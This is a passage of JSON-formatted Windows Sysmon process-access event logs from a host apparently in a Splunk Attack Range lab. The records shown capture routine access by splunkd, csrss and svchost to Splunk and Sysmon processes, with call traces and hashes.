AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001072DD0400}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001072DD0400}","TargetProcessId":"4228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001072DD0400}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001072DD0400}","TargetProcessId":"4228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
